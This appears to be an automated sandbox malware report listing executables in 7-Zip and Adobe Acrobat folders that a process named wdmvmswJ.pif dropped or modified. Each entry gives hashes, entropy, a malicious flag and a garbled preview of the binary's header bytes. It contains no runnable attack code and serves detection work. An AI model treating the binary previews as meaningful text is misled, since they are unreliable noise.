                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.031202568591675
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:J1zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J1zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:64FFBEE6349D67C5DC0DBBFF5D4C84E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:446AEF4ED0935A21EE23800990C63A914360C020
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:051BBBB83C4AFB2E40AC334C0D0B7DBAA5283110572EC162581CA14E2407FB59
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ADD77343229360F3E49C4E7B2487EDD0AB52858F39FB06A3D5EC0C126507B17CC433190D0883A97DEA209C187EDC2D66ACAD19F6D41EB3CD261C810B08562648
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................n......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.712041875421911
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:eRudzEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eAdzEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:11CB1B9A9AD57D23937810FBD3B679E2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50CE78E8CA661427EE728E3F1E0DF126578D31AE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1A8F41F4361E6B94A8ACECCA958085F820F0AED95F318D1046D2D0603CD49EA5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D1F026420E4B51C9A31D73C90863E3F540CE420F08996DFD753F3731DB9C99BC26B0B91FDC36FF93F215C94F2E05312361DCAEBEBFD313AB88CEE1782F36CFDE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.082178683174858
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QvoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:51CC62FB38927AE661780EEE0CFB3C65
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FAD9D0F0445FAA99D292C70D613609AFE19700AA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A88B8A6ADAC54AC34601EC058BF10C3761FD6EA050BFA2A0D0205A4ECF02CE72
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0BC2881B8FE6AC35026AE6CFDF6D4C4CFFCFE5DF7DB48B8E05AD035EF8421EE70CAEA33ADF220901918757D26E7EA9ADA4C1B41395E79CCB09B8784E3B669F14
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.468653222334574
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:K5zhM1XSENsqjnhMgeiCl7G0nehbGZpbD:QMsgDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1D712469286F74CF9753984F430552CF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8D9A72207B51ED2F01D202E5F54404AA23D1DD49
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7772279D10FCE91C0BC48F820850FF930D9CB4DBD8ED2F9C3B5DB25DD807EB3A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F61575F64F08D783B1BEA17F189D88B86C3C68F99C452669CCB18283B5835DC672BDBCA8B471EA9156E284804ADEDC2D72847C8EE510B744E96CD0663E1FB3C0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.....................................x.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.499806100259262
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:5tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755ODmg27RN:5jEIa4HIEWOc5cD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:FDD962728FF0887AA76F704E54B78C85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CB408CB337BA9DEDFB69A546F7D5CA2E3127D195
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5CED031BE6BC6C6B5CA9889BC8C1E5CC636354EE0FAEA0ED31DD8845E66829CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8E71E8A13D9E064538959050757300103AA89819074895988B2CE7023899B5BBFD4B58174727DC075E322D476695D82EB32A6F2DB193B2E5C4DF88E46FE866B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....s.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9993673263725045
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:4Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:3XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EED014C07BB1996FE811430A2D15C198
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84F3ADD386EF3B826C8C60AEEB1710A49E41FCEE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:43736EF2EDF841712CF2E8468AF098D453E745AD85283F3820F13EAB225D5CE8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C67F18DBEAEF95DC4F9D01246EDACFA39A85ECA7FA6F1121A11914AE3D27CFF2400DBB24B543632E7ADAC7B938D944F71D616759942AF533C26F51FD73B54508
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......c.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.084825372376994
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oW4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:odsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0D6DA2D9ACCBF68FA43CFB83C9DF6C66
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:13E37D55CA3F4CF177ECFF2E3E15A64DBC4835FA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F20749A4421F28DDD6B31154EB2355422613FE6BB6EA7FEAAF689822A0C6A45E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B9BF5058A09DCC7E631A2597CF3C1478BC1E71824AF58EC96EFC5BCB05290D807DF72D71CDC5B6F14F10BCDCE0AF75DEAE413DB6E7638565991C41CCF01FEFE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......[1.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.386721709499713
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:RDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXk:inN9KfxLk6GEQTX5UKzNDPD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:4D99934DE66E7A943B13E421E83DEB51
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B7A168DC38B263E4D159F1799FA5DECF6BF753D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:09E1B0A504F290F582BCA5F75AE8C32E0209D79AAA208DD5D3370AD5363949DF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:67032C1E7F237F75A2728542D35A964724AF556B3B8D92C65C8E53CF709F76D080EBEE44F0E5159F088D493A5016BA4EA4E44D9AFAD2C9EB38E1BC607E67891A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......B_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0415025190801455
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:572BA7D2541E74AACF156A1738D6D32D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A20CEB7908F506D37CDC81DF91E447489471EDE1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA0D4DD424CFC7839E096D4B7E4B7D3CCC0C66216BD17B4B6E5CB3112C487AB5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0FF7D1624E215237D0D9C04481F2A0A28011AECCD5C0F503FD92EBC178C33B7C9A4C78AB631C1D184A2E8F1C0F7870F98A78222C18F0A9A7E4F34761A0741B0A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.596686978893825
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:4b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKeD527BWG:ynPgTHIwZoRBk9DdhSUEVIXgKeVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EE72240F1288D09FB5ACFFD06E5038AB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77CEF3DACC3801AC48D387297A549E2B2AF323DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:91B940DEFFA6A42CB1930798954D7D1F3F2C34C151A6A226228A0545CEF862AE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E014B2B8371800E61518A48D415A4A4840DA1CEE2174B581BF21C3B27E79D1DFA28B44CA248F961FF93D7A45C94BC00B028DDBA79051952BB8B16709DABF7EF7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.281838114277466
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3g5FvCPus6sqjnhMgeiCl7G0nehbGZpbD:wftlDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:41A6345FAB17E9E89725C8E037DE4CFD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BEB095E8176EE0D49DFE3BF782A4BFD83675AD64
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B8A1943701A2448E8D79F20168D8AAE14EFF6179CE56F0AA3E489EBF72EDC404
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D817998116AF1DBF9C9E2CD05FDEDC10A0952F35E391BA56A62279B72A73ABF3291E5BCEF3C8EF4CF5408CEEBA579EE6B9CD694E9F5F6CA5B714FF275674915C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p.......\.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.208932022586297
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ojKTIsAjFuvtIfmFthMaT5U8aChaeu8sqjnhMgeiCl7G0nehbGZpbD:ojIMmPh7TT79tDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6DF873DC47711C5A76A2DC8012AB98DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:370AEF501AB8D40BAA3FAF94C4301EEC01A171E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A80AC9D7EDC1ED6D23ED327AB650BC7C7F1C9A25793E5D95E3A1E03D3E964C26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:424D52DEEA7800A7E812CE266BB8E49C6DD1399A0827B46B4A1AA1F29C510D987B7B1EA976118DBD80C416BB6302A26253476BC63812BBAE9BF292A4A8D03959
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.411807687236323
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:sGqVwCto1Gm5WgIsqjnhMgeiCl7G0nehbGZpbD:5Z1GmUfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:91BF3C47E3EBDF9E00B4A9CD28B73520
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7D8A102F103B4AC5A04B708D00F569FFDC18AD2D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8988D3227862B5EFAA1C111ACF1B8337AED0F87B401618270DBCE3D5F67CE314
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F89161EF97C7746031C4FF3B4E7F972529242E6F8FE6D1BA8279344915A707C510D32ACBC4F4FDE052F762107105181E242FCDE5E4AD8ED6AA594AA40C1CC98C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................n..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1253376
